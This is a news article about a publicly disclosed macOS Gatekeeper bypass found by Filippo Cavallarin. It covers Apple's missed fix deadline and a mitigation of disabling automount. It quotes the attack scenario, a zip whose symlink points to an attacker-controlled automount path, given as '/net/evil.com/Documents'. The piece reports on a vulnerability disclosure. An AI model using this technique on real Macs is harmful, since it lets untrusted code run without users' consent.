Security researcher Filippo Cavallarin has detailed a macOS exploit which allows one to bypass Gatekeeper. The exploit works even on macOS Mojave 10.14.5 released by Apple last week.
The exploit will allow hackers or people with malicious intent to run untrusted code without requiring any user permission on a Mac.
Gatekeeper has been a part of macOS since 2012. It automatically prevents unsigned and insecure apps from running and asks for explicit user permission in such scenarios.
The exploit takes advantage of Gatekeeper’s rules of considering both external drives and network shares as safe locations.
Below is a video showing how the exploit works:
The detailed steps on how to use the exploit can be found in the blog post. Cavallarin has also detailed how the exploit can be used by hackers to their advantage.
To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.
Filippo Cavallarin informed Apple about the exploit on February 22nd, 2019. The company was initially in touch with Cavallarin and promised a fix by May 15th, 2019 i.e. within 90 days of the exploit being reported. However, Apple stopped replying to the mail later on and the issue remains a part of macOS 10.14.5 released last week. With the 90-day period over, Cavallarin went ahead and detailed the exploit for the public.
There’s no patch for this exploit as of now, though you can disable automount on your Mac until Apple gets around to resolving it.